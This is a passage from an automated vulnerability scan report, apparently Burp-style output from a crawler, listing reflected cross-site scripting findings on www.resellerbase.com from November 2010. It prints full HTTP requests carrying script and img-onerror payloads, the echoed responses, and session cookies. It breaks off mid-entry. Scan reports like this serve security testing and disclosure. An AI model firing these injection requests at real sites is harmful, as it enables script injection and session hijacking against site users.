2.5258. http://www.resellerbase.com/web-service/software-scripts/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4f0a1<script>alert(1)</script>c5aa4b6b7c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/?4f0a1<script>alert(1)</script>c5aa4b6b7c8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/?4f0a1<script>alert(1)</script>c5aa4b6b7c8=1 was not found on this server.</p>
...[SNIP]...

2.5259. http://www.resellerbase.com/web-service/software-scripts/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 58867<a>17ba5af46c7 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f58867<a>17ba5af46c7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f58867<a>17ba5af46c7 was not found on this server.</p>
...[SNIP]...

2.5260. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b607a<script>alert(1)</script>132f746edf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceb607a<script>alert(1)</script>132f746edf1/software-scripts/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceb607a<script>alert(1)</script>132f746edf1/software-scripts/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5261. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 503b5<script>alert(1)</script>21ae601c06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts503b5<script>alert(1)</script>21ae601c06/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts503b5<script>alert(1)</script>21ae601c06/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5262. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a2a59<script>alert(1)</script>6e897720f0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/googlepr.phpa2a59<script>alert(1)</script>6e897720f0b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/googlepr.phpa2a59<script>alert(1)</script>6e897720f0b was not found on this server.</p>
...[SNIP]...

2.5263. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 89725<a>ce806a0bf52 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/googlepr.php?link_id=2389725<a>ce806a0bf52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/googlepr.php?link_id=2389725<a>ce806a0bf52 was not found on this server.</p>
...[SNIP]...

2.5264. http://www.resellerbase.com/web-service/software-scripts/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 97776<script>alert(1)</script>72a2d919b91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/googlepr.php?97776<script>alert(1)</script>72a2d919b91=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/googlepr.php?97776<script>alert(1)</script>72a2d919b91=1 was not found on this server.</p>
...[SNIP]...

2.5265. http://www.resellerbase.com/web-service/software-scripts/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99fea<script>alert(1)</script>3f8ae2ed2a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service99fea<script>alert(1)</script>3f8ae2ed2a6/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service99fea<script>alert(1)</script>3f8ae2ed2a6/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5266. http://www.resellerbase.com/web-service/software-scripts/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24195<script>alert(1)</script>9622ce09ac6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts24195<script>alert(1)</script>9622ce09ac6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts24195<script>alert(1)</script>9622ce09ac6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5267. http://www.resellerbase.com/web-service/software-scripts/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 571f7<script>alert(1)</script>2d3f13859e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/search.php571f7<script>alert(1)</script>2d3f13859e5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php571f7<script>alert(1)</script>2d3f13859e5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5268. http://www.resellerbase.com/web-service/software-scripts/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5c753<a>70f98dec54a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/search.php?keyword=search...&Submit3=Search5c753<a>70f98dec54a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php?keyword=search...&Submit3=Search5c753<a>70f98dec54a&opt=2 was not found on this server.</p>
...[SNIP]...

2.5269. http://www.resellerbase.com/web-service/software-scripts/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a5f9"><img%20src%3da%20onerror%3dalert(1)>2d567fb479e was submitted in the cat parameter. This input was echoed as 8a5f9\"><img src=a onerror=alert(1)>2d567fb479e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web-service/software-scripts/search.php?cat=148a5f9"><img%20src%3da%20onerror%3dalert(1)>2d567fb479e&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:45:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=148a5f9\"><img src=a onerror=alert(1)>2d567fb479e">
...[SNIP]...

2.5270. http://www.resellerbase.com/web-service/software-scripts/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c1d0"><img%20src%3da%20onerror%3dalert(1)>6c3ae9242f33c4dd1 was submitted in the cat parameter. This input was echoed as 9c1d0\"><img src=a onerror=alert(1)>6c3ae9242f33c4dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/software-scripts/search.php?cat=149c1d0"><img%20src%3da%20onerror%3dalert(1)>6c3ae9242f33c4dd1&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:45:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=149c1d0\"><img src=a onerror=alert(1)>6c3ae9242f33c4dd1">
...[SNIP]...

2.5271. http://www.resellerbase.com/web-service/software-scripts/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 20390<a>1710eb0079c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/search.php?keyword=search...20390<a>1710eb0079c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php?keyword=search...20390<a>1710eb0079c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5272. http://www.resellerbase.com/web-service/software-scripts/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a3962<script>alert(1)</script>d3d4211c03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2&a3962<script>alert(1)</script>d3d4211c03b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2&a3962<script>alert(1)</script>d3d4211c03b=1 was not found on this server.</p>
...[SNIP]...

2.5273. http://www.resellerbase.com/web-service/software-scripts/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload df092<a>27d9303e837 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2df092<a>27d9303e837 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/search.php?keyword=search...&Submit3=Search&opt=2df092<a>27d9303e837 was not found on this server.</p>
...[SNIP]...

2.5274. http://www.resellerbase.com/web-service/software-scripts/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a13c<script>alert(1)</script>30404b82f9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service1a13c<script>alert(1)</script>30404b82f9c/software-scripts/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service1a13c<script>alert(1)</script>30404b82f9c/software-scripts/themes/ was not found on this server.</p>
...[SNIP]...

2.5275. http://www.resellerbase.com/web-service/software-scripts/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d196<script>alert(1)</script>fef26bf6a86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts6d196<script>alert(1)</script>fef26bf6a86/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts6d196<script>alert(1)</script>fef26bf6a86/themes/ was not found on this server.</p>
...[SNIP]...

2.5276. http://www.resellerbase.com/web-service/software-scripts/themes/ [REST URL parameter 3] previous next

Summary

